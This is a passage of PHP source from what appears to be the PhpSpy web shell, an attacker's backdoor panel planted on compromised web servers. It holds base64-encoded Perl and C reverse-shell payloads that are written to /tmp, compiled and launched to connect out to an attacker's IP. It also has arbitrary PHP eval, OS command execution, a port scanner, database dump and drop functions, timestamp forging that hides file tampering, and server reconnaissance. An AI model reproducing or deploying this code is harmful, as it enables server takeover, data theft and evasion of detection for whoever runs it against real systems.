811 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
812 $fp = @fopen($path,'w');
813 if ($fp) {
814 foreach($table as $k => $v) {
815 if ($v) {
816 sqldumptable($v, $fp);
817 }
818 }
819 fclose($fp);
820 $fileurl = str_replace(SA_ROOT,'',$path);
821 m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
822 mysql_close();
823 } else {
824 m('Backup failed');
825 }
826 }
827 }
828 if ($insert && $insertsql) {
829 $keystr = $valstr = $tmp = '';
830 foreach($insertsql as $key => $val) {
831 if ($val) {
832 $keystr .= $tmp.$key;
833 $valstr .= $tmp."'".addslashes($val)."'";
834 $tmp = ',';
835 }
836 }
837 if ($keystr && $valstr) {
838 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
839 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
840 }
841 }
842 if ($update && $insertsql && $base64) {
843 $valstr = $tmp = '';
844 foreach($insertsql as $key => $val) {
845 $valstr .= $tmp.$key."='".addslashes($val)."'";
846 $tmp = ',';
847 }
848 if ($valstr) {
849 $where = base64_decode($base64);
850 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
851 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
852 }
853 }
854 if ($doing == 'del' && $base64) {
855 $where = base64_decode($base64);
856 $delete_sql = "DELETE FROM $tablename WHERE $where";
857 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
858 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
859 }
860
861 if ($tablename && $doing == 'drop') {
862 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
863 if (q("DROP TABLE $tablename")) {
864 m('Drop table of success');
865 $tablename = '';
866 } else {
867 m(mysql_error());
868 }
869 }
870
871 formhead(array('title'=>'MYSQL Manager'));
872 makehide('action','mysqladmin');
873 p('<p>');
874 p('DBHost:');
875 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
876 p(':');
877 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
878 p('DBUser:');
879 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
880 p('DBPass:');
881 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
882 p('DBCharset:');
883 makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
884 makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
885 p('</p>');
886 formfoot();
887
888 //????
889 formhead(array('name'=>'recordlist'));
890 makehide('doing');
891 makehide('action','mysqladmin');
892 makehide('base64');
893 makehide('tablename');
894 p($dbform);
895 formfoot();
896
897 //?????
898 formhead(array('name'=>'setdbname'));
899 makehide('action','mysqladmin');
900 p($dbform);
901 if (!$dbname) {
902 makehide('dbname');
903 }
904 formfoot();
905
906 //???
907 formhead(array('name'=>'settable'));
908 makehide('action','mysqladmin');
909 p($dbform);
910 makehide('tablename');
911 makehide('page',$page);
912 makehide('doing');
913 formfoot();
914
915 $cachetables = array();
916 $pagenum = 30;
917 $page = intval($page);
918 if($page) {
919 $start_limit = ($page - 1) * $pagenum;
920 } else {
921 $start_limit = 0;
922 $page = 1;
923 }
924 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
925 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
926 //???????
927 $mysqlver = mysql_get_server_info();
928 p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
929 $highver = $mysqlver > '4.1' ? 1 : 0;
930
931 //?????
932 $query = q("SHOW DATABASES");
933 $dbs = array();
934 $dbs[] = '-- Select a database --';
935 while($db = mysql_fetch_array($query)) {
936 $dbs[$db['Database']] = $db['Database'];
937 }
938 makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
939 $tabledb = array();
940 if ($dbname) {
941 p('<p>');
942 p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
943 if ($tablename) {
944 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
945 }
946 p('</p>');
947 mysql_select_db($dbname);
948
949 $getnumsql = '';
950 $runquery = 0;
951 if ($sql_query) {
952 $runquery = 1;
953 }
954 $allowedit = 0;
955 if ($tablename && !$sql_query) {
956 $sql_query = "SELECT * FROM $tablename";
957 $getnumsql = $sql_query;
958 $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
959 $allowedit = 1;
960 }
961 p('<form action="'.$self.'" method="POST">');
962 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
963 makehide('tablename', $tablename);
964 makehide('action','mysqladmin');
965 p($dbform);
966 p('</form>');
967 if ($tablename || ($runquery && $sql_query)) {
968 if ($doing == 'structure') {
969 $result = q("SHOW FULL COLUMNS FROM $tablename");
970 $rowdb = array();
971 while($row = mysql_fetch_array($result)) {
972 $rowdb[] = $row;
973 }
974 p('<h3>Structure</h3>');
975 p('<table border="0" cellpadding="3" cellspacing="0">');
976 p('<tr class="head">');
977 p('<td>Field</td>');
978 p('<td>Type</td>');
979 p('<td>Collation</td>');
980 p('<td>Null</td>');
981 p('<td>Key</td>');
982 p('<td>Default</td>');
983 p('<td>Extra</td>');
984 p('<td>Privileges</td>');
985 p('<td>Comment</td>');
986 p('</tr>');
987 foreach ($rowdb as $row) {
988 $thisbg = bg();
989 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
990 p('<td>'.$row['Field'].'</td>');
991 p('<td>'.$row['Type'].'</td>');
992 p('<td>'.$row['Collation'].' </td>');
993 p('<td>'.$row['Null'].' </td>');
994 p('<td>'.$row['Key'].' </td>');
995 p('<td>'.$row['Default'].' </td>');
996 p('<td>'.$row['Extra'].' </td>');
997 p('<td>'.$row['Privileges'].' </td>');
998 p('<td>'.$row['Comment'].' </td>');
999 p('</tr>');
1000 }
1001 tbfoot();
1002 $result = q("SHOW INDEX FROM $tablename");
1003 $rowdb = array();
1004 while($row = mysql_fetch_array($result)) {
1005 $rowdb[] = $row;
1006 }
1007 p('<h3>Indexes</h3>');
1008 p('<table border="0" cellpadding="3" cellspacing="0">');
1009 p('<tr class="head">');
1010 p('<td>Keyname</td>');
1011 p('<td>Type</td>');
1012 p('<td>Unique</td>');
1013 p('<td>Packed</td>');
1014 p('<td>Seq_in_index</td>');
1015 p('<td>Field</td>');
1016 p('<td>Cardinality</td>');
1017 p('<td>Collation</td>');
1018 p('<td>Null</td>');
1019 p('<td>Comment</td>');
1020 p('</tr>');
1021 foreach ($rowdb as $row) {
1022 $thisbg = bg();
1023 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1024 p('<td>'.$row['Key_name'].'</td>');
1025 p('<td>'.$row['Index_type'].'</td>');
1026 p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').' </td>');
1027 p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).' </td>');
1028 p('<td>'.$row['Seq_in_index'].'</td>');
1029 p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').' </td>');
1030 p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).' </td>');
1031 p('<td>'.$row['Collation'].' </td>');
1032 p('<td>'.$row['Null'].' </td>');
1033 p('<td>'.$row['Comment'].' </td>');
1034 p('</tr>');
1035 }
1036 tbfoot();
1037 } elseif ($doing == 'insert' || $doing == 'edit') {
1038 $result = q('SHOW COLUMNS FROM '.$tablename);
1039 while ($row = mysql_fetch_array($result)) {
1040 $rowdb[] = $row;
1041 }
1042 $rs = array();
1043 if ($doing == 'insert') {
1044 p('<h2>Insert new line in '.$tablename.' table »</h2>');
1045 } else {
1046 p('<h2>Update record in '.$tablename.' table »</h2>');
1047 $where = base64_decode($base64);
1048 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1049 $rs = mysql_fetch_array($result);
1050 }
1051 p('<form method="post" action="'.$self.'">');
1052 p($dbform);
1053 makehide('action','mysqladmin');
1054 makehide('tablename',$tablename);
1055 p('<table border="0" cellpadding="3" cellspacing="0">');
1056 foreach ($rowdb as $row) {
1057 if ($rs[$row['Field']]) {
1058 $value = htmlspecialchars($rs[$row['Field']]);
1059 } else {
1060 $value = '';
1061 }
1062 $thisbg = bg();
1063 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1064 if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
1065 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.' </td></tr>');
1066 } else {
1067 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
1068 }
1069 }
1070 if ($doing == 'insert') {
1071 p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1072 } else {
1073 p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1074 makehide('base64', $base64);
1075 }
1076 p('</table></form>');
1077 } else {
1078 $querys = @explode(';',$sql_query);
1079 foreach($querys as $num=>$query) {
1080 if ($query) {
1081 p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
1082 switch(qy($query))
1083 {
1084 case 0:
1085 p('<h2>Error : '.mysql_error().'</h2>');
1086 break;
1087 case 1:
1088 if (strtolower(substr($query,0,13)) == 'select * from') {
1089 $allowedit = 1;
1090 }
1091 if ($getnumsql) {
1092 $tatol = mysql_num_rows(q($getnumsql));
1093 $multipage = multi($tatol, $pagenum, $page, $tablename);
1094 }
1095 if (!$tablename) {
1096 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1097 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1098 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
1099 $tablename = $matches[1][0];
1100 }
1101
1102 /*********************/
1103 $getfield = q("SHOW COLUMNS FROM $tablename");
1104 $rowdb = array();
1105 $keyfied = ''; //????
1106 while($row = @mysql_fetch_assoc($getfield)) {
1107 $rowdb[$row['Field']]['Key'] = $row['Key'];
1108 $rowdb[$row['Field']]['Extra'] = $row['Extra'];
1109 if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
1110 $keyfied = $row['Field'];
1111 }
1112 }
1113 /*********************/
1114 //?????????????
1115 if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
1116 $query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
1117 }
1118
1119 $result = q($query);
1120
1121 p($multipage);
1122 p('<table border="0" cellpadding="3" cellspacing="0">');
1123 p('<tr class="head">');
1124 if ($allowedit) p('<td>Action</td>');
1125 $fieldnum = @mysql_num_fields($result);
1126 for($i=0;$i<$fieldnum;$i++){
1127 $name = @mysql_field_name($result, $i);
1128 $type = @mysql_field_type($result, $i);
1129 $len = @mysql_field_len($result, $i);
1130 p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
1131 }
1132 p('</tr>');
1133
1134 while($mn = @mysql_fetch_assoc($result)){
1135 $thisbg = bg();
1136 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1137 $where = $tmp = $b1 = '';
1138 //???????
1139 foreach($mn as $key=>$inside){
1140 if ($inside) {
1141 //?????????????????,?????,?????????????
1142 if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
1143 $where = $key."='".addslashes($inside)."'";
1144 break;
1145 }
1146 $where .= $tmp.$key."='".addslashes($inside)."'";
1147 $tmp = ' AND ';
1148 }
1149 }
1150 //?????
1151 foreach($mn as $key=>$inside){
1152 $b1 .= '<td nowrap>'.html_clean($inside).' </td>';
1153 }
1154 $where = base64_encode($where);
1155
1156 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
1157
1158 p($b1);
1159 p('</tr>');
1160 unset($b1);
1161 }
1162 p('<tr class="head">');
1163 if ($allowedit) p('<td>Action</td>');
1164 $fieldnum = @mysql_num_fields($result);
1165 for($i=0;$i<$fieldnum;$i++){
1166 $name = @mysql_field_name($result, $i);
1167 $type = @mysql_field_type($result, $i);
1168 $len = @mysql_field_len($result, $i);
1169 p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
1170 }
1171 p('</tr>');
1172 tbfoot();
1173 p($multipage);
1174 break;
1175 case 2:
1176 $ar = mysql_affected_rows();
1177 p('<h2>affected rows : <b>'.$ar.'</b></h2>');
1178 break;
1179 }
1180 }
1181 }
1182 }
1183 } else {
1184 $query = q("SHOW TABLE STATUS");
1185 $table_num = $table_rows = $data_size = 0;
1186 $tabledb = array();
1187 while($table = mysql_fetch_array($query)) {
1188 $data_size = $data_size + $table['Data_length'];
1189 $table_rows = $table_rows + $table['Rows'];
1190 $table['Data_length'] = sizecount($table['Data_length']);
1191 $table_num++;
1192 $tabledb[] = $table;
1193 }
1194 $data_size = sizecount($data_size);
1195 unset($table);
1196 p('<table border="0" cellpadding="0" cellspacing="0">');
1197 p('<form action="'.$self.'" method="POST">');
1198 makehide('action','mysqladmin');
1199 p($dbform);
1200 p('<tr class="head">');
1201 p('<td width="2%" align="center"> </td>');
1202 p('<td>Name</td>');
1203 p('<td>Rows</td>');
1204 p('<td>Data_length</td>');
1205 p('<td>Create_time</td>');
1206 p('<td>Update_time</td>');
1207 if ($highver) {
1208 p('<td>Engine</td>');
1209 p('<td>Collation</td>');
1210 }
1211 p('<td>Operate</td>');
1212 p('</tr>');
1213 foreach ($tabledb as $key => $table) {
1214 $thisbg = bg();
1215 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1216 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
1217 p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
1218 p('<td>'.$table['Rows'].'</td>');
1219 p('<td>'.$table['Data_length'].'</td>');
1220 p('<td>'.$table['Create_time'].' </td>');
1221 p('<td>'.$table['Update_time'].' </td>');
1222 if ($highver) {
1223 p('<td>'.$table['Engine'].'</td>');
1224 p('<td>'.$table['Collation'].'</td>');
1225 }
1226 p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
1227 p('</tr>');
1228 }
1229 p('<tr class="head">');
1230 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1231 p('<td>Name</td>');
1232 p('<td>Rows</td>');
1233 p('<td>Data_length</td>');
1234 p('<td>Create_time</td>');
1235 p('<td>Update_time</td>');
1236 if ($highver) {
1237 p('<td>Engine</td>');
1238 p('<td>Collation</td>');
1239 }
1240 p('<td>Operate</td>');
1241 p('</tr>');
1242 p('<tr class='.bg().'>');
1243 p('<td> </td>');
1244 p('<td>Total tables: '.$table_num.'</td>');
1245 p('<td>'.$table_rows.'</td>');
1246 p('<td>'.$data_size.'</td>');
1247 p('<td colspan="'.($highver ? 5 : 3).'"> </td>');
1248 p('</tr>');
1249
1250 p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>");
1251 makehide('doing','backupmysql');
1252 formfoot();
1253 p("</table>");
1254 fr($query);
1255 }
1256 }
1257 }
1258 tbfoot();
1259 @mysql_close();
1260}//end mysql
1261
1262elseif ($action == 'backconnect') {
1263 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1264 !$yourport && $yourport = '12345';
1265 $usedb = array('perl'=>'perl','c'=>'c');
1266
1267 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
1268 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
1269 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
1270 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
1271 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
1272 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
1273 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1274 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
1275 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
1276 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
1277 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
1278 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
1279 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
1280 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
1281 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1282
1283 if ($start && $yourip && $yourport && $use){
1284 if ($use == 'perl') {
1285 cf('/tmp/angel_bc',$back_connect);
1286 $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
1287 } else {
1288 cf('/tmp/angel_bc.c',$back_connect_c);
1289 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1290 @unlink('/tmp/angel_bc.c');
1291 $res = execute("/tmp/angel_bc $yourip $yourport &");
1292 }
1293 m("Now script try connect to $yourip port $yourport ...");
1294 }
1295
1296 formhead(array('title'=>'Back Connect'));
1297 makehide('action','backconnect');
1298 p('<p>');
1299 p('Your IP:');
1300 makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
1301 p('Your Port:');
1302 makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
1303 p('Use:');
1304 makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
1305 makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
1306 p('</p>');
1307 formfoot();
1308}//end
1309
1310elseif ($action == 'portscan') {
1311 !$scanip && $scanip = '127.0.0.1';
1312 !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
1313 formhead(array('title'=>'Port Scan'));
1314 makehide('action','portscan');
1315 p('<p>');
1316 p('IP:');
1317 makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
1318 p('Port:');
1319 makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
1320 makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
1321 p('</p>');
1322 formfoot();
1323
1324 if ($startscan) {
1325 p('<h2>Result »</h2>');
1326 p('<ul class="info">');
1327 foreach(explode(',', $scanport) as $port) {
1328 $fp = @fsockopen($scanip, $port, &$errno, &$errstr, 1);
1329 if (!$fp) {
1330 p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>');
1331 } else {
1332 p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>');
1333 @fclose($fp);
1334 }
1335 }
1336 p('</ul>');
1337 }
1338}
1339
1340elseif ($action == 'eval') {
1341 $phpcode = trim($phpcode);
1342 if($phpcode){
1343 if (!preg_match('#<\?#si', $phpcode)) {
1344 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1345 }
1346 eval("?".">$phpcode<?");
1347 }
1348 formhead(array('title'=>'Eval PHP Code'));
1349 makehide('action','eval');
1350 maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
1351 p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');
1352 formfooter();
1353}//end eval
1354
1355elseif ($action == 'editfile') {
1356 if(file_exists($opfile)) {
1357 $fp=@fopen($opfile,'r');
1358 $contents=@fread($fp, filesize($opfile));
1359 @fclose($fp);
1360 $contents=htmlspecialchars($contents);
1361 }
1362 formhead(array('title'=>'Create / Edit File'));
1363 makehide('action','file');
1364 makehide('dir',$nowpath);
1365 makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
1366 maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
1367 formfooter();
1368
1369 goback();
1370
1371}//end editfile
1372
1373elseif ($action == 'newtime') {
1374 $opfilemtime = @filemtime($opfile);
1375 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1376 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
1377 formhead(array('title'=>'Clone folder/file was last modified time'));
1378 makehide('action','file');
1379 makehide('dir',$nowpath);
1380 makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1381 makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
1382 formfooter();
1383 formhead(array('title'=>'Set last modified'));
1384 makehide('action','file');
1385 makehide('dir',$nowpath);
1386 makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1387 p('<p>year:');
1388 makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
1389 p('month:');
1390 makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
1391 p('day:');
1392 makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
1393 p('hour:');
1394 makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
1395 p('minute:');
1396 makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
1397 p('second:');
1398 makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
1399 p('</p>');
1400 formfooter();
1401 goback();
1402}//end newtime
1403
1404elseif ($action == 'shell') {
1405 if (IS_WIN && IS_COM) {
1406 if($program && $parameter) {
1407 $shell= new COM('Shell.Application');
1408 $a = $shell->ShellExecute($program,$parameter);
1409 m('Program run has '.(!$a ? 'success' : 'fail'));
1410 }
1411 !$program && $program = 'c:\windows\system32\cmd.exe';
1412 !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
1413 formhead(array('title'=>'Execute Program'));
1414 makehide('action','shell');
1415 makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
1416 p('<p>');
1417 makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
1418 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1419 p('</p>');
1420 formfoot();
1421 }
1422 formhead(array('title'=>'Execute Command'));
1423 makehide('action','shell');
1424 if (IS_WIN && IS_COM) {
1425 $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
1426 makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
1427 }
1428 p('<p>');
1429 makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
1430 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1431 p('</p>');
1432 formfoot();
1433
1434 if ($command) {
1435 p('<hr width="100%" noshade /><pre>');
1436 if ($execfunc=='wscript' && IS_WIN && IS_COM) {
1437 $wsh = new COM('WScript.shell');
1438 $exec = $wsh->exec('cmd.exe /c '.$command);
1439 $stdout = $exec->StdOut();
1440 $stroutput = $stdout->ReadAll();
1441 echo $stroutput;
1442 } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
1443 $descriptorspec = array(
1444 0 => array('pipe', 'r'),
1445 1 => array('pipe', 'w'),
1446 2 => array('pipe', 'w')
1447 );
1448 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1449 if (is_resource($process)) {
1450 fwrite($pipes[0], $command."\r\n");
1451 fwrite($pipes[0], "exit\r\n");
1452 fclose($pipes[0]);
1453 while (!feof($pipes[1])) {
1454 echo fgets($pipes[1], 1024);
1455 }
1456 fclose($pipes[1]);
1457 while (!feof($pipes[2])) {
1458 echo fgets($pipes[2], 1024);
1459 }
1460 fclose($pipes[2]);
1461 proc_close($process);
1462 }
1463 } else {
1464 echo(execute($command));
1465 }
1466 p('</pre>');
1467 }
1468}//end shell
1469
1470elseif ($action == 'phpenv') {
1471 $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1472 $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1473 !$dis_func && $dis_func = 'No';
1474 $info = array(
1475 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
1476 2 => array('Server Domain',$_SERVER['SERVER_NAME']),
1477 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
1478 4 => array('Server OS',PHP_OS),
1479 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
1480 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
1481 7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
1482 8 => array('PHP run mode',strtoupper(php_sapi_name())),
1483 9 => array('The file path',__FILE__),
1484
1485 10 => array('PHP Version',PHP_VERSION),
1486 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
1487 12 => array('Safe Mode',getcfg('safe_mode')),
1488 13 => array('Administrator',$adminmail),
